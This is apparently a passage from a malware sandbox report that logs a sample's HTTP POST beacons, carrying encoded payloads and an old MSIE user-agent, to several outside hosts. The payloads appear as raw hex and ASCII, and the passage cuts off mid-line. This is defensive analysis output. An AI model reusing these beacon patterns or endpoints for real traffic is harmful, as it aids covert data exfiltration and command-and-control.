CQAegPBM0JTRj3oSA3saTaMx+cSYdnuSJNPRt9sLYCcUZNcqnJ3B1mFFe4w7ZS8j/XmUZMRQq8AOA3/0TSBOR+EAc8oteb2KnLh3DJ87V00w0iEnCgReKmwGsDOdMoOhGadkpkApO3xyBGeits/r3CGVCL1AmHQH7ZV6jvfjHBJyPs+1+fZzDvlL4abM7HSsniFgjaHmcYot0O/a/P0o0f6yuQuEXii13jL6cbJq8ML51crlNmJc5VPvAfXS45BctNL3HzAOhvCJ7nE8uqQEBQxub3yAJHkCjjP8moucEybeXJVXM0mkReekwJjxotHV2mfsajWuqheu3fAxIuJhic3SrLLSTjgE7Q01PpYmJM52jQ13glfY5gnyd40ZMeYCN2E1/VIZ7IbwlyqyWAlm4ApdgmjaCL9fGcr5phIfXKo+7tYqqGZnLceP8H/pidUxLstG/O4USSenWBQbK24xPs17M0cVpuZXAcH0g94aHJsZUT7CTQ/7IiZnIyF3Pgx5cUuVk5FRERziIXslyoqCefd3ZMc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.synetik.netCache-Control: no-cacheData Raw: 70 6d 46 35 74 39 34 4a 36 35 54 68 39 5a 48 6a 4b 65 66 36 61 4d 46 32 6c 53 67 65 43 55 6f 2f 38 70 2f 76 6b 54 45 50 49 6c 33 66 44 73 75 4c 76 46 61 72 43 54 4b 4a 4a 74 50 6a 61 52 31 62 41 30 4c 65 55 58 30 74 41 75 73 38 75 55 42 41 56 56 63 71 6e 63 4d 71 6e 69 4d 49 50 39 58 53 57 46 43 67 79 45 53 79 77 49 31 53 77 63 58 45 6f 4d 37 76 46 5a 49 65 4d 55 42 37 53 41 6e 4f 36 6c 2b 2f 49 71 34 36 69 52 51 61 33 32 32 44 72 73 63 47 46 77 75 52 71 79 43 36 48 6e 64 43 47 7a 4b 71 42 30 30 52 43 50 31 76 6d 76 6c 31 55 59 6c 6c 70 44 4a 67 51 74 6b 64 65 7a 73 71 6e 33 64 32 4d 37 59 4b 42 73 6d 53 50 70 4c 39 6a 42 34 35 41 54 57 66 41 74 51 36 34 67 31 31 43 76 58 44 41 66 6f 2b 51 74 7a 4b 69 6b 37 62 77 6b 78 6e 4c 62 4c 58 68 64 47 4d 31 43 30 66 52 2b 46 73 72 34 57 50 46 36 43 66 31 38 65 67 44 43 6a 55 52 73 4a 58 6d 4d 51 78 47 75 67 31 4a 71 4e 63 71 4f 55 4c 39 6a 6c 51 61 51 2b 39 61 4e 59 61 79 45 57 48 78 45 57 6f 4b 44 66 50 34 49 56 32 38 63 71 38 31 57 37 34 6a 50 2f 30 4c 31 75 61 4a 31 48 70 2f 32 77 61 54 37 31 43 35 48 63 69 49 48 63 64 4e 41 43 4e 32 74 55 63 30 39 6a 52 38 66 7a 6f 2f 76 79 7a 54 74 72 49 39 6e 6c 37 74 61 34 79 6f 4f 64 2f 34 78 75 62 2b 57 62 6f 6e 4b 48 6f 78 49 54 44 38 76 4f 68 5a 41 6d 6c 5a 77 70 55 59 6e 34 59 6c 52 6b 4b 44 36 32 4e 6d 69 7a 36 2f 37 79 44 68 65 4a 33 52 37 34 63 67 78 4b 6c 43 6a 57 65 2b 2f 6b 53 51 38 50 4c 56 6e 36 2b 7a 66 77 34 4f 76 36 57 62 6e 74 38 6a 69 74 59 51 61 6f 34 54 4e 68 52 6a 54 62 4c 4a 50 4c 79 45 42 6a 33 53 57 63 64 54 4f 6f 63 72 68 7a 77 77 74 43 38 77 76 42 42 61 48 4a 68 76 36 57 6c 34 6f 6f 75 4e 62 76 52 67 48 5a 58 38 63 6a 6f 6f 77 66 6c 57 53 57 6d 38 38 32 46 37 31 54 2b 6e 41 3d 3d Data Ascii: pmF5t94J65Th9ZHjKef6aMF2lSgeCUo/8p/vkTEPIl3fDsuLvFarCTKJJtPjaR1bA0LeUX0tAus8uUBAVVcqncMqniMIP9XSWFCgyESywI1SwcXEoM7vFZIeMUB7SAnO6l+/Iq46iRQa322DrscGFwuRqyC6HndCGzKqB00RCP1vmvl1UYllpDJgQtkdezsqn3d2M7YKBsmSPpL9jB45ATWfAtQ64g11CvXDAfo+QtzKik7bwkxnLbLXhdGM1C0fR+Fsr4WPF6Cf18egDCjURsJXmMQxGug1JqNcqOUL9jlQaQ+9aNYayEWHxEWoKDfP4IV28cq81W74jP/0L1uaJ1Hp/2waT71C5HciIHcdNACN2tUc09jR8fzo/vyzTtrI9nl7ta4yoOd/4xub+WbonKHoxITD8vOhZAmlZwpUYn4YlRkKD62Nmiz6/7yDheJ3R74cgxKlCjWe+/kSQ8PLVn6+zfw4Ov6Wbnt8jitYQao4TNhRjTbLJPLyEBj3SWcdTOocrhzwwtC8wvBBaHJhv6Wl4oouNbvRgHZX8cjoowflWSWm882F71T+nA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 38 6c 34 47 66 6f 73 37 30 4a 51 36 71 4c 4c 6c 34 6c 74 4f 6b 2f 52 70 6c 64 33 52 5a 50 61 51 37 39 31 59 34 75 6d 62 2b 33 41 56 62 7a 4b 75 69 4b 49 6b 59 35 39 58 33 73 39 73 32 42 4c 54 30 63 33 44 52 69 32 52 39 50 56 51 4a 44 54 41 74 34 52 30 37 5a 4b 43 38 7a 31 2b 68 62 6c 45 4a 63 4b 33 42 77 30 36 77 41 2f 79 6b 63 46 42 4c 53 30 69 62 32 62 68 59 6f 6d 73 44 51 47 67 4c 66 63 2b 57 45 48 34 49 51 79 55 51 68 31 6c 51 53 68 2b 35 73 71 6f 32 2f 56 32 6f 69 68 61 49 59 4a 67 7a 36 65 49 57 7a 77 6a 64 45 4d 52 64 42 66 35 61 32 2f 56 44 58 74 30 44 59 6b 43 75 52 44 33 45 73 4b 64 39 41 4a 64 46 62 42 41 69 68 6d 57 75 50 56 51 63 6e 48 70 61 45 69 66 74 4a 47 4d 63 6b 48 44 37 64 43 35 5a 38 45 6e 52 5a 2f 42 56 32 33 6a 7a 6b 6f 6e 69 51 4f 4c 36 78 70 72 38 69 4d 77 69 33 34 77 4d 37 38 53 50 70 4a 4f 77 36 55 6c 48 73 73 39 58 47 6c 52 55 56 55 6a 64 6d 34 75 41 72 2b 50 33 6a 6c 4d 7a 72 42 50 55 4a 38 2f 57 4d 37 51 38 38 6d 57 48 4a 43 49 48 50 6b 66 64 67 6a 4c 45 32 41 34 69 30 46 78 69 30 34 54 33 64 6e 58 64 6a 37 57 65 4c 4e 71 74 31 57 49 70 42 41 37 61 49 4d 76 69 72 72 2f 78 65 65 5a 74 6a 6a 35 7a 61 41 52 37 67 61 58 49 72 45 73 62 64 35 32 50 54 4f 5a 79 31 4b 70 4e 73 6e 69 72 47 42 33 72 7a 7a 4b 41 64 6f 47 58 37 4e 42 4e 42 61 4f 41 64 54 6e 6e 45 2f 2b 38 69 54 6b 2f 70 79 72 2f 63 6d 4c 72 33 77 2b 7a 43 47 2b 4c 6e 32 57 64 59 39 37 6d 46 50 48 46 2f 77 31 44 79 4a 65 41 2b 38 4a 6d 41 55 54 53 37 6b 58 38 56 6e 6a 33 74 6c 33 49 64 65 41 54 51 56 35 42 4b 43 59 51 6e 4d 38 6e 4a 53 77 50 4b 54 57 56 44 54 4d 74 36 33 30 38 54 30 76 69 4e 71 41 45 70 6c 79 63 62 6f 56 31 45 5a 4f 46 71 67 58 53 30 61 58 6f 56 37 7a 34 68 64 44 33 6f 4f 37 61 56 43 67 42 59 31 74 59 51 51 36 58 67 59 64 63 41 3d 3d Data Ascii: 8l4Gfos70JQ6qLLl4ltOk/Rpld3RZPaQ791Y4umb+3AVbzKuiKIkY59X3s9s2BLT0c3DRi2R9PVQJDTAt4R07ZKC8z1+hblEJcK3Bw06wA/ykcFBLS0ib2bhYomsDQGgLfc+WEH4IQyUQh1lQSh+5sqo2/V2oihaIYJgz6eIWzwjdEMRdBf5a2/VDXt0DYkCuRD3EsKd9AJdFbBAihmWuPVQcnHpaEiftJGMckHD7dC5Z8EnRZ/BV23jzkoniQOL6xpr8iMwi34wM78SPpJOw6UlHss9XGlRUVUjdm4uAr+P3jlMzrBPUJ8/WM7Q88mWHJCIHPkfdgjLE2A4i0Fxi04T3dnXdj7WeLNqt1WIpBA7aIMvirr/xeeZtjj5zaAR7gaXIrEsbd52PTOZy1KpNsnirGB3rzzKAdoGX7NBNBaOAdTnnE/+8iTk/pyr/cmLr3w+zCG+Ln2WdY97mFPHF/w1DyJeA+8JmAUTS7kX8Vnj3tl3IdeATQV5BKCYQnM8nJSwPKTWVDTMt6308T0viNqAEplycboV1EZOFqgXS0aXoV7z4hdD3oO7aVCgBY1tYQQ6XgYdcA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 57 66 73 49 74 5a 66 31 36 70 54 76 64 6d 39 6d 68 70 62 32 5a 65 43 50 74 6c 44 4e 70 54 54 74 75 77 6f 49 61 34 56 6e 4d 62 51 36 70 32 72 55 4c 4e 6d 4f 32 32 6f 33 41 69 58 59 78 78 61 4a 6c 38 74 57 2b 77 4b 30 48 50 4b 7a 54 36 59 4c 45 50 53 59 56 39 36 6f 52 35 69 6b 63 35 4c 33 36 55 6b 56 58 54 58 41 78 77 50 4e 42 32 63 53 4e 34 61 59 2f 33 4b 42 31 58 54 5a 4f 6a 4c 6a 52 39 56 4a 45 69 59 75 7a 67 69 61 71 6d 45 6a 44 71 4c 7a 45 75 36 56 6c 52 68 45 7a 5a 6f 6d 42 55 65 61 6e 37 41 43 6c 61 38 69 72 41 68 56 54 63 38 6e 6c 4b 33 50 34 71 47 44 6c 4c 4a 59 67 4d 70 32 68 72 79 34 75 75 72 32 38 76 68 71 38 54 67 4e 2f 42 66 46 46 4c 79 36 6d 58 6d 64 42 69 4a 2f 56 79 66 65 35 76 65 66 70 47 4a 59 57 56 30 4d 66 61 49 65 6f 6f 30 5a 4d 33 36 57 51 2f 6c 69 49 7a 6c 35 47 42 68 53 61 39 73 51 76 61 69 42 4f 38 78 74 4f 69 37 65 44 73 67 70 4a 50 4b 46 75 76 59 77 58 64 35 30 62 43 44 34 55 31 58 39 31 54 59 35 7a 69 73 43 58 49 64 49 5a 35 6b 6c 31 59 7a 49 62 4f 62 61 66 6b 66 64 71 70 58 4e 72 61 69 37 77 59 46 75 58 41 71 2f 44 36 45 57 74 56 53 44 47 53 75 30 48 58 36 79 34 6a 2f 74 6b 78 36 36 31 6f 42 47 67 56 4b 35 54 50 37 71 38 61 71 30 32 66 69 2f 72 36 5a 55 4b 45 78 47 73 31 48 73 2b 39 6b 33 66 7a 51 62 6f 41 46 4d 2f 46 33 36 72 64 62 74 77 35 76 6c 56 6a 47 41 45 50 47 74 69 74 68 51 6d 44 54 6a 31 43 5a 45 53 50 75 49 6d 72 53 4d 73 41 30 6d 76 52 38 49 6b 4d 65 57 6f 2f 75 38 32 6d 66 65 73 34 51 5a 48 50 44 4c 65 6c 76 61 35 76 4f 65 69 54 48 35 54 46 77 48 45 32 2b 58 47 34 4d 52 79 70 51 56 4a 56 32 35 59 4e 2f 37 50 42 42 59 6e 77 36 77 38 47 70 67 47 62 33 78 31 44 4e 58 56 38 78 73 73 6f 42 46 4b 65 52 51 49 6b 62 66 4a 5a 47 58 38 53 70 32 53 31 41 2b 54 47 55 3d Data Ascii: WfsItZf16pTvdm9mhpb2ZeCPtlDNpTTtuwoIa4VnMbQ6p2rULNmO22o3AiXYxxaJl8tW+wK0HPKzT6YLEPSYV96oR5ikc5L36UkVXTXAxwPNB2cSN4aY/3KB1XTZOjLjR9VJEiYuzgiaqmEjDqLzEu6VlRhEzZomBUean7ACla8irAhVTc8nlK3P4qGDlLJYgMp2hry4uur28vhq8TgN/BfFFLy6mXmdBiJ/Vyfe5vefpGJYWV0MfaIeoo0ZM36WQ/liIzl5GBhSa9sQvaiBO8xtOi7eDsgpJPKFuvYwXd50bCD4U1X91TY5zisCXIdIZ5kl1YzIbObafkfdqpXNrai7wYFuXAq/D6EWtVSDGSu0HX6y4j/tkx661oBGgVK5TP7q8aq02fi/r6ZUKExGs1Hs+9k3fzQboAFM/F36rdbtw5vlVjGAEPGtithQmDTj1CZESPuImrSMsA0mvR8IkMeWo/u82mfes4QZHPDLelva5vOeiTH5TFwHE2+XG4MRypQVJV25YN/7PBBYnw6w8GpgGb3x1DNXV8xssoBFKeRQIkbfJZGX8Sp2S1A+TGU=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 49 61 64 56 61 4c 49 6e 34 4a 54 56 70 42 73 38 35 65 4d 44 2f 4c 56 58 66 73 71 43 62 5a 4d 35 42 73 6e 6a 52 68 52 53 37 70 72 66 79 30 46 37 52 6d 6d 67 56 54 39 44 41 65 79 5a 2b 73 4e 63 66 75 6f 39 31 6f 30 77 6c 6b 63 6e 39 46 75 44 71 48 39 36 55 42 49 2b 73 6d 4e 70 69 58 4c 4a 4b 32 56 43 4d 32 49 39 41 47 66 32 63 70 61 42 37 78 4f 75 62 2f 77 56 4d 6f 7a 5a 38 6b 72 37 69 6f 46 58 33 53 65 7a 42 36 35 4e 34 47 4f 49 42 59 4b 4c 74 64 32 30 36 49 65 67 78 46 77 4e 43 64 4b 37 59 61 56 2b 72 6f 49 7a 30 63 61 69 75 4e 48 61 39 6e 38 34 4f 59 51 79 4d 32 55 31 78 55 70 78 78 6f 73 42 74 68 61 4b 6a 51 41 31 74 59 76 63 64 6d 49 57 58 4c 4a 68 48 64 42 74 51 32 72 53 64 4f 61 79 44 4d 63 45 4e 4a 6b 78 58 42 69 45 73 30 6f 41 77 39 37 54 35 65 6e 67 44 67 5a 72 6a 64 46 33 56 5a 64 46 42 45 5a 39 5a 52 59 78 56 2f 2f 78 48 50 68 4a 4b 4d 58 45 4f 43 4b 6a 62 42 5a 72 56 41 75 5a 65 54 2f 7a 64 41 39 47 34 39 7a 66 44 70 34 36 53 64 6d 67 58 7a 49 6f 7a 2b 4d 65 6d 37 4b 35 6b 46 35 74 62 58 75 68 48 77 72 50 64 71 62 6c 53 79 4e 75 37 48 59 58 49 48 46 6e 36 4b 78 49 43 47 52 4c 62 35 56 38 32 66 77 50 76 2b 33 53 32 5a 58 75 30 59 68 75 2f 61 48 78 68 50 53 58 33 72 6a 2b 45 64 64 61 53 6e 70 4c 2f 6a 55 5a 75 2f 66 49 70 7a 66 44 4b 5a 59 30 4e 6d 75 33 73 45 4a 68 2f 35 34 52 52 32 41 72 43 6c 61 58 35 42 5a 69 34 6e 62 61 65 36 2f 54 53 6c 4a 2f 7a 33 4c 49 4c 45 61 4b 76 4d 2b 38 59 34 51 72 6e 7a 41 61 72 61 57 65 76 4b 64 79 52 71 71 55 75 43 76 38 51 31 58 56 76 49 64 63 7a 64 48 2f 4a 6a 2f 64 7a 64 33 31 4a 31 69 35 4f 55 4e 71 71 71 53 67 49 61 33 52 59 45 51 50 57 4a 68 31 35 78 62 58 4b 46 4f 31 74 4e 76 35 31 44 66 6d 79 43 69 6e Data Ascii: IadVaLIn4JTVpBs85eMD/LVXfsqCbZM5BsnjRhRS7prfy0F7RmmgVT9DAeyZ+sNcfuo91o0wlkcn9FuDqH96UBI+smNpiXLJK2VCM2I9AGf2cpaB7xOub/wVMozZ8kr7ioFX3SezB65N4GOIBYKLtd206IegxFwNCdK7YaV+roIz0caiuNHa9n84OYQyM2U1xUpxxosBthaKjQA1tYvcdmIWXLJhHdBtQ2rSdOayDMcENJkxXBiEs0oAw97T5engDgZrjdF3VZdFBEZ9ZRYxV//xHPhJKMXEOCKjbBZrVAuZeT/zdA9G49zfDp46SdmgXzIoz+Mem7K5kF5tbXuhHwrPdqblSyNu7HYXIHFn6KxICGRLb5V82fwPv+3S2ZXu0Yhu/aHxhPSX3rj+EddaSnpL/jUZu/fIpzfDKZY0Nmu3sEJh/54RR2ArClaX5BZi4nbae6/TSlJ/z3LILEaKvM+8Y4QrnzAaraWevKdyRqqUuCv8Q1XVvIdczdH/Jj/dzd31J1i5OUNqqqSgIa3RYEQPWJh15xbXKFO1tNv51DfmyCin
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 38 6c 34 47 66 6f 73 37 30 4a 51 36 71 4c 4c 6c 34 6c 74 4f 6b 2f 52 70 6c 64 33 52 5a 50 61 51 37 39 31 59 34 75 6d 62 2b 33 41 56 62 7a 4b 75 69 4b 49 6b 59 35 39 58 33 73 39 73 32 42 4c 54 30 63 33 44 52 69 32 52 39 50 56 51 4a 44 54 41 74 34 52 30 37 5a 4b 43 38 7a 31 2b 68 62 6c 45 4a 63 4b 33 42 77 30 36 77 41 2f 79 6b 63 46 42 4c 53 30 69 62 32 62 68 59 6f 6d 73 44 51 47 67 4c 66 63 2b 57 45 48 34 49 51 79 55 51 68 31 6c 51 53 68 2b 35 73 71 6f 32 2f 56 32 6f 69 68 61 49 59 4a 67 7a 36 65 49 57 7a 77 6a 64 45 4d 52 64 42 66 35 61 32 2f 56 44 58 74 30 44 59 6b 43 75 52 44 33 45 73 4b 64 39 41 4a 64 46 62 42 41 69 68 6d 57 75 50 56 51 63 6e 48 70 61 45 69 66 74 4a 47 4d 63 6b 48 44 37 64 43 35 5a 38 45 6e 52 5a 2f 42 56 32 33 6a 7a 6b 6f 6e 69 51 4f 4c 36 78 70 72 38 69 4d 77 69 33 34 77 4d 37 38 53 50 70 4a 4f 77 36 55 6c 48 73 73 39 58 47 6c 52 55 56 55 6a 64 6d 34 75 41 72 2b 50 33 6a 6c 4d 7a 72 42 50 55 4a 38 2f 57 4d 37 51 38 38 6d 57 48 4a 43 49 48 50 6b 66 64 67 6a 4c 45 32 41 34 69 30 46 78 69 30 34 54 33 64 6e 58 64 6a 37 57 65 4c 4e 71 74 31 57 49 70 42 41 37 61 49 4d 76 69 72 72 2f 78 65 65 5a 74 6a 6a 35 7a 61 41 52 37 67 61 58 49 72 45 73 62 64 35 32 50 54 4f 5a 79 31 4b 70 4e 73 6e 69 72 47 42 33 72 7a 7a 4b 41 64 6f 47 58 37 4e 42 4e 42 61 4f 41 64 54 6e 6e 45 2f 2b 38 69 54 6b 2f 70 79 72 2f 63 6d 4c 72 33 77 2b 7a 43 47 2b 4c 6e 32 57 64 59 39 37 6d 46 50 48 46 2f 77 31 44 79 4a 65 41 2b 38 4a 6d 41 55 54 53 37 6b 58 38 56 6e 6a 33 74 6c 33 49 64 65 41 54 51 56 35 42 4b 43 59 51 6e 4d 38 6e 4a 53 77 50 4b 54 57 56 44 54 4d 74 36 33 30 38 54 30 76 69 4e 71 41 45 70 6c 79 63 62 6f 56 31 45 5a 4f 46 71 67 58 53 30 61 58 6f 56 37 7a 34 68 64 44 33 6f 4f 37 61 56 43 67 42 59 31 74 59 51 51 36 58 67 59 64 63 41 3d 3d Data Ascii: 8l4Gfos70JQ6qLLl4ltOk/Rpld3RZPaQ791Y4umb+3AVbzKuiKIkY59X3s9s2BLT0c3DRi2R9PVQJDTAt4R07ZKC8z1+hblEJcK3Bw06wA/ykcFBLS0ib2bhYomsDQGgLfc+WEH4IQyUQh1lQSh+5sqo2/V2oihaIYJgz6eIWzwjdEMRdBf5a2/VDXt0DYkCuRD3EsKd9AJdFbBAihmWuPVQcnHpaEiftJGMckHD7dC5Z8EnRZ/BV23jzkoniQOL6xpr8iMwi34wM78SPpJOw6UlHss9XGlRUVUjdm4uAr+P3jlMzrBPUJ8/WM7Q88mWHJCIHPkfdgjLE2A4i0Fxi04T3dnXdj7WeLNqt1WIpBA7aIMvirr/xeeZtjj5zaAR7gaXIrEsbd52PTOZy1KpNsnirGB3rzzKAdoGX7NBNBaOAdTnnE/+8iTk/pyr/cmLr3w+zCG+Ln2WdY97mFPHF/w1DyJeA+8JmAUTS7kX8Vnj3tl3IdeATQV5BKCYQnM8nJSwPKTWVDTMt6308T0viNqAEplycboV1EZOFqgXS0aXoV7z4hdD3oO7aVCgBY1tYQQ6XgYdcA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 34 50 7a 4a 66 63 66 4b 2b 5a 54 6c 49 75 36 49 39 6f 6c 59 49 5a 43 49 6e 71 47 39 71 74 6f 6b 36 78 70 39 53 53 39 37 66 48 65 4b 6a 62 79 44 4a 76 4c 38 6b 37 62 67 69 2f 49 45 66 38 6d 4a 65 36 6e 39 4f 68 56 64 62 64 6b 41 34 4f 4f 47 50 7a 62 68 38 5a 46 72 76 67 42 38 69 38 49 6f 57 4f 67 75 52 50 62 70 74 62 37 50 72 62 74 62 43 4a 72 47 49 71 6b 36 36 58 48 69 4d 70 33 57 72 73 53 70 30 34 34 4c 33 47 42 78 56 41 35 37 6e 74 44 50 75 37 34 72 37 43 59 30 75 6a 70 4e 48 48 37 71 57 35 64 38 2f 4b 48 6f 7a 67 73 65 48 6d 6a 42 4f 6d 4c 77 52 45 6b 6c 49 78 37 44 5a 53 34 34 35 79 69 66 30 48 37 42 51 56 62 78 4d 4d 6a 66 76 65 77 4e 64 30 4f 74 51 30 4a 2b 65 6e 6a 75 64 76 32 37 55 44 73 4f 59 31 4b 66 34 57 45 44 2b 6c 6b 4b 45 52 2f 6f 67 41 31 38 4c 4d 48 74 67 73 6a 67 65 75 4d 6f 4f 58 4d 67 6d 44 36 56 58 71 55 55 49 64 70 35 6c 63 4e 50 2f 49 56 53 58 37 35 36 61 45 39 61 6a 6a 50 37 31 6a 5a 5a 4d 72 44 76 43 4a 6b 4b 37 52 4c 6b 31 7a 48 56 56 30 72 57 70 62 50 53 2f 34 78 71 67 75 31 61 6c 68 59 72 4b 6c 70 6d 65 76 72 32 74 7a 4d 51 69 4a 79 46 2f 65 4d 4d 75 37 63 36 72 52 73 4e 70 32 57 68 30 6f 39 32 73 6a 49 2f 55 41 38 51 2b 64 49 59 39 79 31 33 4e 79 78 78 7a 4e 66 6a 64 6d 74 50 35 59 65 76 7a 34 37 59 53 2f 75 62 68 6a 34 4b 31 75 4f 48 68 76 74 42 65 47 6f 76 66 78 37 7a 69 47 4e 72 2b 58 42 77 4d 4a 62 6a 64 4d 58 48 41 5a 42 77 4d 54 64 55 75 69 47 6a 57 54 2f 54 54 58 2b 66 49 36 4d 52 6c 35 44 6f 36 30 56 6c 75 66 4e 53 47 62 6c 6c 67 62 51 42 51 50 74 72 5a 6c 44 4c 57 52 35 56 61 4d 67 48 2f 59 4d 6f 57 78 5a 54 51 5a 7a 38 57 32 78 78 5a 6e 41 31 68 2b 57 63 73 79 4b 72 33 71 6c 51 45 43 64 32 62 55 35 56 37 56 34 57 54 63 75 71 2f 4f 62 78 48 6a 54 55 4d 6b 64 4a 55 2f 58 75 6b 31 6e 49 2f 77 3d 3d Data Ascii: 4PzJfcfK+ZTlIu6I9olYIZCInqG9qtok6xp9SS97fHeKjbyDJvL8k7bgi/IEf8mJe6n9OhVdbdkA4OOGPzbh8ZFrvgB8i8IoWOguRPbptb7PrbtbCJrGIqk66XHiMp3WrsSp044L3GBxVA57ntDPu74r7CY0ujpNHH7qW5d8/KHozgseHmjBOmLwREklIx7DZS445yif0H7BQVbxMMjfvewNd0OtQ0J+enjudv27UDsOY1Kf4WED+lkKER/ogA18LMHtgsjgeuMoOXMgmD6VXqUUIdp5lcNP/IVSX756aE9ajjP71jZZMrDvCJkK7RLk1zHVV0rWpbPS/4xqgu1alhYrKlpmevr2tzMQiJyF/eMMu7c6rRsNp2Wh0o92sjI/UA8Q+dIY9y13NyxxzNfjdmtP5Yevz47YS/ubhj4K1uOHhvtBeGovfx7ziGNr+XBwMJbjdMXHAZBwMTdUuiGjWT/TTX+fI6MRl5Do60VlufNSGbllgbQBQPtrZlDLWR5VaMgH/YMoWxZTQZz8W2xxZnA1h+WcsyKr3qlQECd2bU5V7V4WTcuq/ObxHjTUMkdJU/Xuk1nI/w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 4e 6f 6e 73 68 77 67 66 2b 70 51 48 6f 79 57 77 53 37 5a 48 66 58 75 48 56 51 57 51 50 74 2b 64 76 4c 70 74 73 64 64 74 32 71 4f 43 72 2b 6e 72 64 33 74 54 38 73 61 67 53 49 47 6b 48 52 4f 4b 6c 32 68 66 56 79 36 51 4e 32 78 7a 75 77 63 35 4c 6d 62 6b 54 77 63 45 67 6c 50 77 56 64 58 46 59 55 6c 4a 52 42 79 58 4d 4d 68 52 71 70 6d 72 68 44 45 4a 61 66 32 6c 64 6c 6b 33 2f 34 32 36 71 77 41 69 54 2b 43 41 42 41 77 58 30 38 5a 4b 79 59 2b 75 66 76 57 46 2f 73 4f 54 44 2b 54 61 34 4d 74 75 35 72 6c 33 4f 73 30 4f 4f 46 74 50 75 69 73 31 67 2b 4f 53 49 57 37 64 79 66 44 47 53 32 77 68 79 43 37 51 4a 34 70 59 70 52 6b 2f 4b 6b 4f 30 4a 65 75 6f 32 45 6f 36 4b 67 68 33 6b 66 4d 65 50 34 5a 36 33 66 77 67 55 77 42 4e 73 58 39 53 44 2f 46 78 75 55 4d 4c 54 45 44 6e 56 72 6f 49 33 32 75 68 33 6b 7a 72 6d 77 30 66 4b 46 4d 6d 79 79 41 33 2f 69 64 2f 39 6a 42 4b 61 62 56 55 55 69 67 4e 47 45 33 75 4d 78 78 6b 4d 76 5a 69 61 73 78 34 51 46 49 57 32 52 4e 48 48 76 2b 65 69 69 74 2f 53 67 76 43 50 46 51 30 75 68 7a 68 6d 6c 74 32 54 76 55 65 67 55 6c 38 69 70 31 79 65 41 31 58 78 79 57 38 57 6b 4b 5a 41 30 42 39 71 78 74 6d 36 38 32 33 76 4e 45 73 4a 58 6a 75 74 6f 48 7a 49 43 6d 67 4e 75 76 76 36 68 57 73 39 4e 74 36 43 58 6d 47 5a 36 45 59 58 4a 78 4b 74 76 67 55 6f 48 31 6e 6e 70 47 76 6d 6b 65 6c 4f 2f 68 73 73 56 6f 5a 56 61 42 73 37 34 4b 37 2f 37 46 51 39 46 66 70 58 78 59 33 7a 59 46 5a 47 65 75 6a 64 72 51 43 7a 49 4a 4e 6d 48 63 51 33 72 6a 68 5a 65 53 72 55 74 46 57 64 37 79 78 2f 6a 44 53 6f 33 70 70 76 79 52 42 49 35 4e 55 50 47 55 33 55 63 4e 69 47 78 4f 43 6e 54 54 38 32 47 59 4f 58 35 73 41 61 32 7a 6e 4d 73 54 41 79 44 4b 41 31 73 32 30 69 33 68 51 37 2f 62 51 62 6f 58 58 51 65 2b 71 42 33 43 48 Data Ascii: Nonshwgf+pQHoyWwS7ZHfXuHVQWQPt+dvLptsddt2qOCr+nrd3tT8sagSIGkHROKl2hfVy6QN2xzuwc5LmbkTwcEglPwVdXFYUlJRByXMMhRqpmrhDEJaf2ldlk3/426qwAiT+CABAwX08ZKyY+ufvWF/sOTD+Ta4Mtu5rl3Os0OOFtPuis1g+OSIW7dyfDGS2whyC7QJ4pYpRk/KkO0Jeuo2Eo6Kgh3kfMeP4Z63fwgUwBNsX9SD/FxuUMLTEDnVroI32uh3kzrmw0fKFMmyyA3/id/9jBKabVUUigNGE3uMxxkMvZiasx4QFIW2RNHHv+eiit/SgvCPFQ0uhzhmlt2TvUegUl8ip1yeA1XxyW8WkKZA0B9qxtm6823vNEsJXjutoHzICmgNuvv6hWs9Nt6CXmGZ6EYXJxKtvgUoH1nnpGvmkelO/hssVoZVaBs74K7/7FQ9FfpXxY3zYFZGeujdrQCzIJNmHcQ3rjhZeSrUtFWd7yx/jDSo3ppvyRBI5NUPGU3UcNiGxOCnTT82GYOX5sAa2znMsTAyDKA1s20i3hQ7/bQboXXQe+qB3CH
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 39 2b 54 44 58 32 63 68 41 5a 58 55 56 5a 41 4b 46 71 2f 62 67 7a 41 34 6d 4a 7a 64 42 53 4b 47 69 34 74 77 66 72 46 4c 6f 37 6e 49 57 52 57 62 4b 35 42 65 6e 58 68 51 76 52 7a 4a 43 65 4c 48 36 44 39 41 55 41 53 37 41 43 2b 62 47 73 34 32 7a 6a 41 4b 41 58 39 55 63 51 51 72 54 34 77 33 57 39 72 79 4c 76 71 48 62 77 56 76 31 51 63 59 61 30 61 4f 46 71 44 4a 79 58 4f 53 79 57 71 38 57 71 49 6b 47 74 64 58 64 62 38 74 2b 73 62 69 30 74 65 4f 76 45 44 5a 6a 4e 62 77 77 35 